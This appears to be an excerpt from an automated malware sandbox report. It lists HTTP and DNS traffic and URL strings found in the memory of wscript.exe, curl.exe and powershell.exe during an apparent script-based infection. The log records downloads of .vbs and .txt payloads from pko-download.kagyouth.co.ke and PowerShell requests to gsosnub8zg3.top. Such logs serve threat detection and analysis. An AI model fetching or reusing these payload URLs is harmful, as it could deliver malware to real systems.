            Source: global trafficHTTP traffic detected: GET /js/bmkvfo.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='dhtq2YMRepnKwY9EJrtT9w'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="http://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='dhtq2YMRepnKwY9EJrtT9w'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="http://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='dhtq2YMRe
            Source: global trafficDNS traffic detected: DNS query: pko-download.kagyouth.co.ke
            Source: global trafficDNS traffic detected: DNS query: gsosnub8zg3.top
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA018B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA018B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top/1.php?s=mints21
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
            Source: powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01AB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPa
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01014000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA5578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comx
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267622863.000001E9B13A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
            Source: powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
            Source: wscript.exe, 0000000A.00000003.2262779914.000001E9B1122000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265704354.000001E9AF2CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262502439.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267541819.000001E9B1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265742678.000001E9AF2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266685065.000001E9AF635000.00000004.00000020.00020000.00000000.sdmp, 67618a47ee8cd.vbs.4.drString found in binary or memory: https://pko-download.kagyouth.co.ke/
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmp, 67618a47ee8c5.vbsString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs&
            Source: wscript.exe, 00000000.00000002.2239998782.000001E17E8B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2239498112.000001E17E8B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs3
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs5
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsF
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsWinsta0
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbscurl
            Source: wscript.exe, 00000007.00000002.2284471756.0000015CCBA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2282477339.0000015CCBA89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/ion
            Source: wscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js
            Source: wscript.exe, wscript.exe, 00000007.00000003.2282647670.0000015CCDB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281995052.0000015CCD9CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2282140588.0000015CCD8B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284821071.0000015CCD8B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284895080.0000015CCD9D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/bmkvfo.txt
            Source: wscript.exe, wscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2240251368.000001E9B1124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2240009164.000001E9B1124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2263136546.000001E9B1395000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266845754.000001E9B1120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt72
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txt88.amsi.csv8
            Source: wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/iethuj.txtke
            Source: wscript.exe, 00000007.00000003.2281995052.0000015CCD9CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284895080.0000015CCD9D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/jsX:.
            Source: wscript.exe, wscript.exe, 0000000A.00000003.2262502439.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266845754.000001E9B1120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php
            Source: wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php5
            Source: wscript.exe, 00000007.00000002.2284642077.0000015CCBB04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281970950.0000015CCBB03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281733327.0000015CCBAF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpf
            Source: wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpk
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0052E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
